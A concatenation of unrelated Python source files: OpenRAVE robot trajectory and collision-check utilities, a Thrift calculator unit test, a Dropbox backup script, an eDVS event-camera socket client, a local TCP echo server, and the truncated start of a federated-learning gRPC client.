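#   # -> [0.0, 1.0, 2.0, 3.0, 4.0, 4.6]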
def VanDerCorputSampleGenerator(start, end, step=2, **kwargs):
"""
This wraps VanDerCorputSequence() in a way that's useful for
collision-checking.
Generates a sequence of values from start to end, with specified
step size, using an approximate binary Van der Corput sequence.
The start and end values will always be checked first.
For example, on the interval [0.0, 13.7], the sequence is:
[0.0, 13.7, 12.0, 6.0, 4.0, 8.0, 2.0, 10.0]
@param float start: The start value of the sequence.
@param float end: The last value of the sequence.
@param float step: The step-size between values.
@returns generator: A sequence of float values.
"""
# 'start' and 'end' must be positive because
# itertools.islice() only accepts a positive integer
if end <= start:
raise ValueError("The 'end' value must be greater than "
"the 'start' value.")
if not (step > 0):
raise ValueError("The 'step' value must be positive.")
# Construct the points at which checks must occur to cover this range.
check_bins = numpy.arange(start, end, step)
is_checked = [False] * len(check_bins)
# Always return the start and end points first.
is_checked[0] = True
yield start
yield end
# Return a collision-checking sequence that eventually covers the range.
vdc = VanDerCorputSequence(lower=start, upper=end, include_endpoints=False)
for s in vdc:
if numpy.all(is_checked):
return
idx = numpy.digitize((s,), check_bins, right=True)
assert idx.shape == (1,)
if is_checked[idx[0]]:
continue
is_checked[idx[0]] = True
yield float(check_bins[idx])
def GetCollisionCheckPts(robot, traj, include_start=True, start_time=0.,
first_step=None, epsilon=1e-6):
"""
Generate a list of (time, configuration) pairs to collision check.
If every generated configuration is collision free, then the trajectory is
guaranteed to be collision free up to DOF resolution. This function only
operates on timed trajectories. If you want to use this function on a path,
then consider using the util.ComputeUnitTiming function to compute its
arclength parameterization.
@param trajectory: timed trajectory
@returns generator of (time, configuration) pairs
"""
# TODO: This enters an infinite loop if start_time is non-zero.
if not IsTimedTrajectory(traj):
raise ValueError(
'Trajectory must be timed. If you want to use this function on a'
' path, then consider using util.ComputeUnitTiming to compute its'
' arclength parameterization.')
cspec = traj.GetConfigurationSpecification()
dof_indices, _ = cspec.ExtractUsedIndices(robot)
q_resolutions = robot.GetDOFResolutions()[dof_indices]
duration = traj.GetDuration()
if not (0. <= start_time < duration + epsilon):
raise ValueError(
'Start time {:.6f} is out of range [0, {:.6f}].'.format(
start_time, duration))
start_time = min(start_time, duration)
if first_step is None:
first_step = duration - start_time
if not (0. < first_step <= duration - start_time):
raise ValueError(
'First step {:.6f} is out of range (0, {:.6f}]'.format(
first_step, duration - start_time))
    # Bisection method. Start at the beginning of the trajectory and initialize
# the stepsize to the end of the trajectory.
t_prev = start_time
q_prev = cspec.ExtractJointValues(
traj.GetWaypoint(t_prev), robot, dof_indices)
dt = first_step
# Always collision check the first point.
if include_start:
yield t_prev, q_prev
while t_prev < duration - epsilon:
t_curr = t_prev + dt
q_curr = cspec.ExtractJointValues(
traj.Sample(t_curr), robot, dof_indices)
# Step violated dof resolution. Halve the step size and continue.
if (numpy.abs(q_curr - q_prev) > q_resolutions).any():
dt = dt / 2.
# Yield this configuration. Double the step size and continue.
else:
yield t_curr, q_curr
q_prev = q_curr
t_prev = min(t_curr, duration)
dt = 2. * dt
def GetLinearCollisionCheckPts(robot, traj, norm_order=2, sampling_func=None):
"""
For a piece-wise linear trajectory, generate a list
of configuration pairs that need to be collision checked.
This will step along the trajectory from start to end
    at a resolution that satisfies the specified error metric.
@param openravepy.Robot robot: The robot.
@param openravepy.Trajectory traj: The trajectory for which we need
to generate sample points.
@param int norm_order: 1 ==> The L1 norm
2 ==> The L2 norm
inf ==> The L_infinity norm
@param generator sampling_func A function that returns a sequence of
sample times.
e.g. SampleTimeGenerator()
or
VanDerCorputSampleGenerator()
@returns generator: A tuple (t,q) of float values, being the sample
time and joint configuration.
"""
traj_cspec = traj.GetConfigurationSpecification()
# Make sure trajectory is linear in joint space
try:
# OpenRAVE trajectory type can be 'linear', 'quadratic', or
# other values including 'cubic', 'quadric' or 'quintic'
interp_type = traj_cspec.GetGroupFromName('joint_values').interpolation
except openravepy.openrave_exception:
raise ValueError('Trajectory does not have a joint_values group')
if interp_type != 'linear':
raise ValueError('Trajectory must be linear in joint space')
dof_indices, _ = traj_cspec.ExtractUsedIndices(robot)
# If trajectory only has 1 waypoint then we only need to
# do 1 collision check.
num_waypoints = traj.GetNumWaypoints()
if num_waypoints == 1:
t = 0.0
waypoint = traj.GetWaypoint(0)
q = traj_cspec.ExtractJointValues(waypoint, robot, dof_indices)
yield t, q
return
env = robot.GetEnv()
# Get the resolution (in radians) for each joint
q_resolutions = robot.GetDOFResolutions()[dof_indices]
# Create a list such that element i contains the number of collision
# checks to check the trajectory from the start up to waypoint i
checks = [0.0] * num_waypoints
# If traj is timed, we want to return meaningful t values, keep track
# of trajectory durations up to each waypoint to make this easier
traj_timed = IsTimedTrajectory(traj)
durations = [0.0] * num_waypoints
# Get the first waypoint to initialize the iteration
waypoint = traj.GetWaypoint(0)
q0 = traj_cspec.ExtractJointValues(waypoint, robot, dof_indices)
# Iterate over each segment in the trajectory and set
# the timing of each waypoint in the temporary trajectory
# so that taking steps of t=1 will be within a required error norm.
for i in range(1, num_waypoints):
# We already have the first waypoint (q0) of this segment,
# so get the joint values for the second waypoint.
waypoint = traj.GetWaypoint(i)
q1 = traj_cspec.ExtractJointValues(waypoint, robot, dof_indices)
dq = numpy.abs(q1 - q0)
# Get the number of steps (as a float) required for
# each joint at DOF resolution
num_steps = dq / q_resolutions
# Calculate the norm:
#
# norm_order = 1 ==> The L1 norm
# Which is like a diamond shape in configuration space
# and equivalent to: L1_norm=sum(num_steps)
#
# norm_order = 2 ==> The L2 norm
# Which is like an ellipse in configuration space
# and equivalent to: L2_norm=numpy.linalg.norm(num_steps)
#
# norm_order = inf ==> The L_infinity norm
# Which is like a box shape in configuration space
# and equivalent to: L_inf_norm=numpy.max(num_steps)
norm = numpy.linalg.norm(num_steps, ord=norm_order)
# Set timing of this waypoint
checks[i] = checks[i-1] + norm
if traj_timed:
durations[i] = durations[i-1] + traj_cspec.ExtractDeltaTime(waypoint)
# The last waypoint becomes the first in the next segment
q0 = q1
required_checks = checks[-1]
# Sample the trajectory using the specified sample generator
seq = None
if sampling_func is None:
# (default) Linear sequence, from start to end
        seq = SampleTimeGenerator(0, required_checks, step=1,
                                  include_endpoints=True)
else:
seq = sampling_func(0, required_checks, step=1, include_endpoints=True)
# Sample a check and return the associated time in the original
# trajectory and joint position
checks = numpy.array(checks)
for c in seq:
# Convert the check number into a time in the original trajectory
sidx = numpy.searchsorted(checks, c)
t = None
if sidx == 0:
q = traj_cspec.ExtractJointValues(traj.GetWaypoint(0), robot, dof_indices)
else:
# Find the correct linear interpolation time
p = (c - checks[sidx-1]) / (checks[sidx] - checks[sidx-1])
# Interpolate
spt = traj_cspec.ExtractJointValues(traj.GetWaypoint(sidx-1), robot, dof_indices)
ept = traj_cspec.ExtractJointValues(traj.GetWaypoint(sidx), robot, dof_indices)
q = spt + p*(ept - spt)
if traj_timed:
stime = durations[sidx-1]
etime = durations[sidx]
t = stime + p*(etime - stime)
yield t, q
def IsInCollision(traj, robot, selfcoll_only=False):
report = openravepy.CollisionReport()
# Get trajectory length.
NN = traj.GetNumWaypoints()
ii = 0
total_dist = 0.0
for ii in range(NN - 1):
point1 = traj.GetWaypoint(ii)
point2 = traj.GetWaypoint(ii + 1)
dist = 0.0
total_dof = robot.GetActiveDOF()
for jj in range(total_dof):
dist += pow(point1[jj] - point2[jj], 2)
total_dist += numpy.sqrt(dist)
step_dist = 0.04
if traj.GetDuration() < 0.001:
openravepy.planningutils.RetimeActiveDOFTrajectory(traj, robot)
total_time = traj.GetDuration()
step_time = total_time * step_dist / total_dist
for t in numpy.arange(0.0, total_time, step_time):
point = traj.Sample(t)
collision = False
with robot.GetEnv():
robot.SetActiveDOFValues(point)
if robot.CheckSelfCollision(report):
collision = True
if not collision:
if ((not selfcoll_only) and
robot.GetEnv().CheckCollision(robot, report)):
collision = True
if collision:
return True
return False
OPENRAVE_JOINT_DERIVATIVES = {
0: "joint_values",
1: "joint_velocities",
2: "joint_accelerations",
3: "joint_jerks",
4: "joint_snaps",
5: "joint_crackles",
6: "joint_pops"
}
def GetJointDerivativeGroup(cspec, derivative):
"""
Helper function to extract a joint derivative group from a trajectory.
We use a manual mapping of joint derivatives to string values because the
OpenRAVE source code internally hard codes these constants anyway:
https://github.com/rdiankov/openrave/blob/master/src/libopenrave/configurationspecification.cpp#L983
@param cspec a trajectory configurationspecification
@param derivative the desired joint position derivative
(e.g. 0 = positions, 1 = velocities, ...)
@return a ConfigurationSpecification Group for the derivative
or None if it does not exist in the specification.
"""
try:
return cspec.GetGroupFromName(OPENRAVE_JOINT_DERIVATIVES[derivative])
except KeyError:
return None
except openravepy.openrave_exception:
return None
def JointStatesFromTraj(robot, traj, times, derivatives=[0, 1, 2]):
"""
Helper function to extract the joint position, velocity and acceleration
from an OpenRAVE trajectory.
@param robot The OpenRAVE robot
@param traj An OpenRAVE trajectory
@param times List of times in seconds
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
if not IsTimedTrajectory(traj):
raise ValueError("Joint states can only be interpolated"
" on a timed trajectory.")
duration = traj.GetDuration()
times = numpy.array(times)
if any(times > duration):
raise ValueError('Input times {0:} exceed duration {1:.2f}'
.format(times, duration))
cspec = traj.GetConfigurationSpecification()
num_dofs = robot.GetDOF()
dof_indices = range(num_dofs)
pva_list = []
for t in times:
pva = [None] * len(derivatives)
trajdata = traj.Sample(t)
for i, deriv in enumerate(derivatives):
pva[i] = cspec.ExtractJointValues(trajdata, robot,
dof_indices, deriv)
pva_list.append(pva)
return pva_list
def JointStateFromTraj(robot, traj, time, derivatives=[0, 1, 2]):
"""
Helper function to extract the joint position, velocity and acceleration
from an OpenRAVE trajectory.
@param robot The OpenRAVE robot
@param traj An OpenRAVE trajectory
@param time time in seconds
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
return JointStatesFromTraj(robot, traj, (time,), derivatives)[0]
def BodyPointsStatesFromJointStates(bodypoints,
jointstates,
derivatives=[0, 1, 2]):
"""
    Computes the derivatives of body points given joint states.
Currently only supports derivatives up to 2.
@param bodypoints List of bodypoints where each bodypoint
is a list comprising of:
(1) the OpenRAVE link the bodypoint is on
(2) position of the body point in the link frame
@param jointstates List of list of joint derivatives.
Unavailable fields are input as 'None'
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return bodypoint_list List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
# Convert derivatives to numpy array
derivatives = numpy.array(derivatives)
maxd = max(derivatives)
numd = len(derivatives)
if any(derivatives > 2):
raise ValueError("Can only support derivatives up to 2.")
# Assume everything belongs to the same robot and env
robot = bodypoints[0][0].manipulator.GetRobot()
env = robot.GetEnv()
bpstate_list = []
with env:
with robot:
for js in jointstates:
# Make all unavailable and undesired derivatives None
q, qd, qdd = [js[x] if x < len(js) and x <= maxd
else None for x in range(3)]
if q is not None:
robot.SetDOFValues(q)
else:
bpstate_list.append([[[None] * numd] * len(bodypoints)])
continue
for bp in bodypoints:
bp_state = [None] * numd
link, local_pos = bp
link_index = link.GetIndex()
link_transform = link.GetTransform()
world_pos = (numpy.dot(link_transform[0:3, 0:3],
local_pos) +
link_transform[0:3, 3])
bp_state[0] = world_pos
if qd is not None:
Jpos = robot.CalculateJacobian(link_index, world_pos)
Jang = robot.CalculateAngularVelocityJacobian(
link_index)
vpos = numpy.dot(Jpos, qd)
vang = numpy.dot(Jang, qd)
bp_state[1] = numpy.hstack((vpos, vang))
else:
continue
if qdd is not None:
Hpos = robot.ComputeHessianTranslation(
link_index, world_pos)
Hang = robot.ComputeHessianAxisAngle(link_index)
apos = (numpy.dot(Jpos, qdd) +
numpy.dot(qd, numpy.dot(Hpos, qd)))
aang = (numpy.dot(Jang, qdd) +
numpy.dot(qd, numpy.dot(Hang, qd)))
bp_state[2] = numpy.hstack((apos, aang))
bpstate_list.append(bp_state)
return bpstate_list
def BodyPointsStatesFromJointState(bodypoints, jointstate,
derivatives=[0, 1, 2]):
"""
Computes the pos, vel, acc of body points given the
pos, vel, acc of jointstates.
@param bodypoints List of bodypoints where each bodypoint
is a list comprising of:
(1) the OpenRAVE link the bodypoint is on
(2) position of the body point in the link frame
@param jointstate List of joint position,
velocity and acceleration.
Unavailable fields are input as 'None'
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return bodypoint_list List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
return BodyPointsStatesFromJointStates(bodypoints, (jointstate,),
derivatives)[0]
def BodyPointsStatesFromTraj(bodypoints, traj, times, derivatives=[0, 1, 2]):
"""
Computes the pos, vel, acc of body points from a joint space trajectory
at specified times.
@param bodypoints List of bodypoints where each bodypoint
is a list comprising of:
(1) the OpenRAVE link the bodypoint is on
(2) position of the body point in the link frame
@param traj An OpenRAVE trajectory
@param time List of times in seconds
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return bodypoint_list List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
# Assume everything belongs to the same robot
robot = bodypoints[0][0].manipulator.GetRobot()
jointstates = JointStatesFromTraj(robot, traj, times,
range(max(derivatives)))
return BodyPointsStatesFromJointStates(bodypoints, jointstates,
derivatives)
def BodyPointsStateFromTraj(bodypoints, traj, time, derivatives=[0, 1, 2]):
"""
Computes the pos, vel, acc of body points from a joint space trajectory
at a specified time.
@param bodypoints List of bodypoints where each bodypoint
is a list comprising of:
(1) the OpenRAVE link the bodypoint is on
(2) position of the body point in the link frame
@param traj An OpenRAVE trajectory
@param derivatives list of desired derivatives defaults to [0, 1, 2]
@return bodypoint_list List of list of derivatives at specified times.
Inserts 'None' for unavailable or undesired fields
The i-th element is the derivatives[i]-th derivative
of position of size |times| x |derivatives|
"""
return BodyPointsStatesFromTraj(bodypoints, traj, (time,), derivatives)[0]
def wrap_to_interval(angles, lower=-numpy.pi):
"""
Wraps an angle into a semi-closed interval of width 2*pi.
By default, this interval is `[-pi, pi)`. However, the lower bound of the
interval can be specified to wrap to the interval `[lower, lower + 2*pi)`.
If `lower` is an array the same length as angles, the bounds will be
applied element-wise to each angle in `angles`.
See: http://stackoverflow.com/a/32266181
@param angles an angle or 1D array of angles to wrap
@type angles float or numpy.array
@param lower optional lower bound on wrapping interval
@type lower float or numpy.array
"""
return (angles - lower) % (2 * numpy.pi) + lower
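# Examples:
#   wrap_to_interval(3.0 * numpy.pi / 2.0)          # -> -pi/2
#   wrap_to_interval(-numpy.pi / 2.0, lower=0.0)    # -> 3*pi/2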
def GetManipulatorIndex(robot, manip=None):
"""
Takes a robot and returns the active manipulator and its index.
@param robot The OpenRAVE robot
@param manip The robot manipulator
@return (manip, manip_idx) The manipulator and its index
"""
from openravepy import DebugLevel, RaveGetDebugLevel, RaveSetDebugLevel
with robot.GetEnv():
if manip is None:
manip = robot.GetActiveManipulator()
with robot.CreateRobotStateSaver(
robot.SaveParameters.ActiveManipulator):
robot.SetActiveManipulator(manip)
# Ignore GetActiveManipulatorIndex's DeprecationWarning.
debug_level = RaveGetDebugLevel()
try:
RaveSetDebugLevel(DebugLevel.Error)
manip_idx = manip.GetRobot().GetActiveManipulatorIndex()
finally:
RaveSetDebugLevel(debug_level)
return (manip, manip_idx)
def GetPointFrom(focus):
"""
Given a kinbody, array or transform, returns the xyz location.
@param focus The area to be referred to
"""
# Pointing at a kinbody
if isinstance(focus, openravepy.KinBody):
with focus.GetEnv():
focus_trans = focus.GetTransform()
coord = list(focus_trans[0:3, 3])
# Pointing at a kinbody link
elif isinstance(focus, openravepy.KinBody.Link):
with focus.GetParent().GetEnv():
focus_trans = focus.GetTransform()
coord = list(focus_trans[0:3, 3])
# Pointing at a point in space as numpy array
elif (isinstance(focus, numpy.ndarray) and
(focus.ndim == 1) and (len(focus) == 3)):
coord = list(focus)
# Pointing at point in space as 4x4 transform
elif isinstance(focus, numpy.ndarray) and (focus.shape == (4, 4)):
coord = list(focus[0:3, 3])
# Pointing at a point in space as list or tuple
elif (isinstance(focus, (tuple, list)) and len(focus) == 3):
coord = focus
else:
raise ValueError('Focus of the point is an unknown object')
return coord
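# Illustrative calls for GetPointFrom (a sketch; `body` stands for any
# openravepy.KinBody already in the environment):
#   GetPointFrom(body)                # KinBody -> translation of its transform
#   GetPointFrom(numpy.eye(4))        # 4x4 transform -> [0.0, 0.0, 0.0]
#   GetPointFrom([0.1, 0.2, 0.3])     # 3-element list/tuple -> returned as-is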
|
test_tutorial_client.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import sys
sys.path.append(os.path.abspath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "../")
))
from jsonthrift.jsonthrift import JsonThrift
import socket
import unittest
import multiprocessing
import time
from thrift_tutorial.server import CalculatorHandler
transport = 'TBufferedTransport'
protocol = 'TBinaryProtocol'
thrift_file = 'thrift_tutorial/tutorial.thrift'
service = 'Calculator'
def compare(a, b):
if type(a) != type(b):
return False
    if isinstance(a, dict):
        for k, v in a.iteritems():
            if k not in b or not compare(v, b[k]):
                return False
        return True
    elif isinstance(a, list):
        if len(a) != len(b):
            return False
        for i in xrange(len(a)):
            if not compare(a[i], b[i]):
                return False
        return True
    else:
        return a == b
def start_server():
sys.path.append('thrift_tutorial/gen-py')
from tutorial import Calculator
from tutorial.ttypes import InvalidOperation, Operation
from shared.ttypes import SharedStruct
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
handler = CalculatorHandler()
processor = Calculator.Processor(handler)
transport = TSocket.TServerSocket(port=9090)
tfactory = TTransport.TBufferedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)
server.serve()
class RemoteCallTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.p = multiprocessing.Process(target=start_server)
cls.p.start()
time.sleep(1)
addr = socket.getaddrinfo(
"localhost", 9090, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE | socket.AI_ADDRCONFIG)
cls.socket = socket.socket(addr[0][0], addr[0][1])
try:
cls.socket.connect(addr[0][4])
except Exception, e:
print "To run these tests, you have to start tutorial server first!"
raise e
@classmethod
def tearDownClass(cls):
cls.socket.close()
cls.p.terminate()
@classmethod
def remote_call(cls, msg):
cls.socket.send(msg)
return cls.socket.recv(1024)
def test_add(self):
method = 'add'
params = {"num1": 1, "num2": 3}
expect = {"success": 4}
jt = JsonThrift(transport, protocol, thrift_file, service)
msg = jt.pack_request(method, params, 1)
result = jt.unpack_response(self.remote_call(msg))[4]
self.assertTrue(compare(result, expect))
def test_calculate_normal(self):
method = 'calculate'
params = {"logid": 1, "w": { "op": 1, "num1": 1, "num2": 0 } }
expect = {'success': 1}
jt = JsonThrift(transport, protocol, thrift_file, service)
msg = jt.pack_request(method, params, 1)
result = jt.unpack_response(self.remote_call(msg))[4]
self.assertTrue(compare(result, expect))
def test_calculate_exception(self):
method = 'calculate'
params = {"logid": 1, "w":{"op": 4, "num1": 1, "num2": 0}}
expect = {'ouch': {'whatOp': 4, 'why': 'Cannot divide by 0'}}
jt = JsonThrift(transport, protocol, thrift_file, service)
msg = jt.pack_request(method, params, 1)
result = jt.unpack_response(self.remote_call(msg))[4]
self.assertTrue(compare(result, expect))
if __name__ == '__main__':
unittest.main()
|
dbak.py
|
#!/usr/bin/env python3
import configparser
import logging
import os
import sys
import dropbox
from dropbox.exceptions import ApiError, AuthError, BadInputError
from dropbox.files import WriteMode
logging.basicConfig(format='dbak %(asctime)s %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %I:%M:%S')
_logger = logging.getLogger(__name__)
_logger.setLevel(logging.DEBUG)
DBX = False
BACKUP_PATHS = []
def validate_config():
config = configparser.ConfigParser()
config.read('config.ini')
# check dropbox connection
try:
access_token = config['DEFAULT']['ACCESS_TOKEN']
dbx = dropbox.Dropbox(access_token)
account = dbx.users_get_current_account()
        _logger.info('Dropbox authenticated successfully as {0}'.
format(account.name.display_name))
global DBX
DBX = dbx
except KeyError as e:
_logger.error(
'Missing or wrong config format in ./config.ini {}'.format(e))
return False
except (AuthError, BadInputError) as e:
        _logger.error('Dropbox authentication failed {}'.format(e))
return False
# check backup paths
try:
backup_paths = config['DEFAULT']['BACKUP_PATHS']
backup_paths = backup_paths.split()
if not backup_paths:
_logger.warning('No file paths to backup.')
return False
path_not_exists = []
expand_backup_paths = []
for path in backup_paths:
expand_path = os.path.expanduser(path)
expand_backup_paths.append(expand_path)
if not os.path.exists(expand_path):
path_not_exists.append(path)
if path_not_exists:
            _logger.error('These paths do not exist: {}'.
format(', '.join(path_not_exists)))
return False
global BACKUP_PATHS
BACKUP_PATHS = expand_backup_paths
except KeyError:
_logger.error('Missing or wrong config format in ./config.ini')
return False
return True
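# Expected layout of ./config.ini, inferred from the keys read above (the token
# and paths below are placeholders, not real values):
#   [DEFAULT]
#   ACCESS_TOKEN = <your-dropbox-access-token>
#   BACKUP_PATHS = ~/Documents/notes.txt ~/projects
# BACKUP_PATHS is whitespace-separated and each entry is expanded with
# os.path.expanduser before being checked for existence.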
def get_recursive_files(path):
if os.path.isfile(path):
return [path]
paths = []
for path, subdirs, files in os.walk(path):
for name in files:
paths.append(os.path.join(path, name))
return paths
def upload_file(path):
with open(path, 'rb') as f:
try:
_logger.info('Uploading {} ...'.format(path))
DBX.files_upload(f.read(), path, mode=WriteMode('overwrite'))
except ApiError as e:
_logger.error('Error occurred: {}'.format(e))
def delete_file(path):
try:
_logger.info('Remove {} ...'.format(path))
DBX.files_delete(path)
except ApiError as e:
_logger.error('Error occurred: {}'.format(e))
def backup(BACKUP_PATHS):
upload_files = []
for path in BACKUP_PATHS:
for p in get_recursive_files(path):
# # threading seems not work
# thread = threading.Thread(target=upload_file, args=[p])
# thread.daemon = True
# thread.start()
upload_file(p)
upload_files.append(p)
remove_files = []
for entry in DBX.files_list_folder(path='', recursive=True).entries:
if isinstance(entry, dropbox.files.FileMetadata) and \
entry.path_display not in upload_files:
remove_files.append(entry.path_display)
if remove_files:
for p in remove_files:
# thread = threading.Thread(target=delete_file, args=[p])
# thread.daemon = True
# thread.start()
delete_file(p)
return True
if __name__ == '__main__':
if not validate_config():
sys.exit(1)
backup(BACKUP_PATHS)
|
edvs.py
|
import numpy as np
import threading
import atexit
import time
class Serial(object):
def __init__(self, port, baud):
import serial
self.conn = serial.Serial(port, baudrate=baud, rtscts=True, timeout=0)
def send(self, message):
self.conn.write(message.encode('utf-8'))
def receive(self):
return self.conn.read(1024)
def close(self):
self.conn.close()
import socket
class Socket(object):
cache = {}
def __init__(self, address, port=56000):
self.socket = Socket.get_socket(address, port)
@classmethod
def get_socket(cls, address, port):
key = (address, port)
s = cls.cache.get(key, None)
if s is None:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((address, port))
s.settimeout(0)
cls.cache[key] = s
return s
def send(self, message):
self.socket.send(message.encode())
def receive(self):
try:
return self.socket.recv(1024)
except socket.error:
return b''
def close(self):
self.socket.close()
class EDVS:
def __init__(self):
self.connection = None
self.retina_packet_size = None
self.image = None
self.record_file = None
def connect(self, connection):
self.connection = connection
self.last_time = {}
self.connection.send('\n')
self.retina(False)
atexit.register(self.disconnect)
thread = threading.Thread(target=self.sensor_loop)
thread.daemon = True
thread.start()
def disconnect(self):
self.retina(False)
if self.record_file is not None:
self.record_file.close()
self.connection.close()
def retina(self, active, bytes_in_timestamp=4):
if active:
assert bytes_in_timestamp in [0, 2, 3, 4]
cmd = '!E%d\nE+\n' % bytes_in_timestamp
self.retina_packet_size = 2 + bytes_in_timestamp
else:
cmd = 'E-\n'
self.retina_packet_size = None
self.connection.send(cmd)
def show_image(self, decay=0.5, display_mode='quick'):
if self.image is None:
self.image = np.zeros((128, 128), dtype=float)
thread = threading.Thread(target=self.image_loop,
args=(decay, display_mode))
thread.daemon = True
thread.start()
def image_loop(self, decay, display_mode):
import pylab
import matplotlib.pyplot as plt
# using axis for updating only parts of the image that change
fig, ax = plt.subplots()
# so quick mode can run on ubuntu
plt.show(block=False)
pylab.ion()
img = pylab.imshow(self.image, vmax=1, vmin=-1,
interpolation='none', cmap='binary')
pylab.xlim(0, 127)
pylab.ylim(127, 0)
while True:
img.set_data(self.image)
if display_mode == 'quick':
# this is faster, but doesn't work on all systems
fig.canvas.draw()
fig.canvas.flush_events()
elif display_mode == 'ubuntu_quick':
# this is even faster, but doesn't work on all systems
ax.draw_artist(ax.patch)
ax.draw_artist(img)
fig.canvas.update()
fig.canvas.flush_events()
else:
# this works on all systems, but is kinda slow
pylab.pause(1e-8)
self.image *= decay
def sensor_loop(self):
"""Handle all data coming from the robot."""
old_data = None
buffered_ascii = b''
while True:
packet_size = self.retina_packet_size
# grab the new data
data = self.connection.receive()
if len(data) > 0:
print(len(data))
# combine it with any leftover data from last time through the loop
if old_data is not None:
data = old_data + data
old_data = None
if packet_size is None:
# no retina events, so everything should be ascii
buffered_ascii += data
else:
# find the ascii events
data_all = np.frombuffer(data, np.uint8)
ascii_index = np.where(data_all[::packet_size] < 0x80)[0]
offset = 0
while len(ascii_index) > 0:
# if there's an ascii event, remove it from the data
index = ascii_index[0]*packet_size
stop_index = np.where(data_all[index:] >=0x80)[0]
if len(stop_index) > 0:
stop_index = index + stop_index[0]
else:
stop_index = len(data)
# and add it to the buffered_ascii list
buffered_ascii += data[offset+index:offset+stop_index]
data_all = np.hstack((data_all[:index],
data_all[stop_index:]))
offset += stop_index - index
ascii_index = np.where(data_all[::packet_size] < 0x80)[0]
# handle any partial retina packets
extra = len(data_all) % packet_size
if extra != 0:
old_data = data[-extra:]
data_all = data_all[:-extra]
if len(data_all) > 0:
# now process those retina events
self.process_retina(data_all)
# and process the ascii events too
while b'\n' in buffered_ascii:
cmd, buffered_ascii = buffered_ascii.split(b'\n', 1)
self.process_ascii(cmd)
def process_ascii(self, message):
message = message.decode('utf-8')
print(message)
last_timestamp = None
def process_retina(self, data):
packet_size = self.retina_packet_size
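        # Event packet layout, inferred from the parsing below and from retina(),
        # which sets packet_size = 2 + bytes_in_timestamp:
        #   byte 0: high bit set marks a retina event; low 7 bits are the y coordinate
        #   byte 1: low 7 bits are the x coordinate; high bit encodes the polarity
        #   bytes 2..: optional timestamp bytes (0, 2, 3 or 4 of them)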
y = data[::packet_size] & 0x7f
x = data[1::packet_size] & 0x7f
if self.record_file is not None:
self.record_file.write(data)
if self.image is not None:
value = np.where(data[1::packet_size]>=0x80, 1, -1)
np.add.at(self.image, (y, x), value)
def record_retina_data(self, filename):
self.record_file = open(filename, 'wb')
if __name__ == '__main__':
edvs = EDVS()
edvs.connect(Socket('99.250.220.231', port=9105))
#edvs.connect(Serial('COM6', baud=4000000))
time.sleep(1)
edvs.retina(True)
edvs.show_image(display_mode='quick', decay=0.2)
while True:
time.sleep(0.01)
|
work_TCP_server.py
|
# import socket
#
# s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# s.connect(('www.sina.com.cn', 80))
#
# s.send(b'GET / HTTP/1.1\r\nHost: www.sina.com.cn\r\nConnection: close\r\n\r\n')
#
# buffer = []
# while True:
# d=s.recv(1024)
# if d:
# buffer.append(d)
# else:
# break
#
# data=b''.join(buffer)
#
# s.close()
#
# header, html = data.split(b'\r\n\r\n',1)
# print(header.decode('utf-8'))
#
# with open('sina.html','wb') as f:
# f.write(html)
import socket,threading,time
def tcplink(sock, addr):
print('Accept new connection from %s:%s...' % addr)
sock.send(b'Welcome!')
while True:
data = sock.recv(1024)
time.sleep(1)
if not data or data.decode('utf-8') == 'exit':
break
sock.send(('Hello, %s!' % data.decode('utf-8')).encode('utf-8'))
sock.close()
print('Connection from %s:%s closed.' % addr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 9999))
s.listen(5)
print('Waiting for connection...')
while True:
    # Accept a new connection:
sock, addr = s.accept()
    # Spawn a new thread to handle the TCP connection:
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
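# A minimal client for exercising this echo server (a sketch for manual testing;
# run it in a separate interpreter while the server above is listening):
#
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect(('127.0.0.1', 9999))
#   print(c.recv(1024))                      # b'Welcome!'
#   for name in [b'Michael', b'Tracy', b'Sarah']:
#       c.send(name)
#       print(c.recv(1024))                  # b'Hello, <name>!'
#   c.send(b'exit')
#   c.close()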
|
run_client.py
|
import os
import sys
import argparse
import torch
import grpc
import psutil
import numpy as np
import syft as sy
from syft.workers import websocket_server
from torchvision import transforms
import threading
import time
import logging
# Add data folder to path
pwd = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'data')
sys.path.append(pwd)
# Add common folder to path
pwd = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'common')
sys.path.append(pwd)
# Add summary folder to path
pwd = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'common', 'summary')
sys.path.append(pwd)
from utilities import Utility as util
import devicetocentral_pb2
import devicetocentral_pb2_grpc
from hist import HistSummary, HistMatSummary
devid = ""
DP_EPSILON = 0.1
# register device with central server and get device id
def register_to_central(args):
with grpc.insecure_channel(args.centralip + ':50051') as channel:
stub = devicetocentral_pb2_grpc.DeviceToCentralStub(channel)
logging.info('Registering to central server: ' + args.centralip + ':50051')
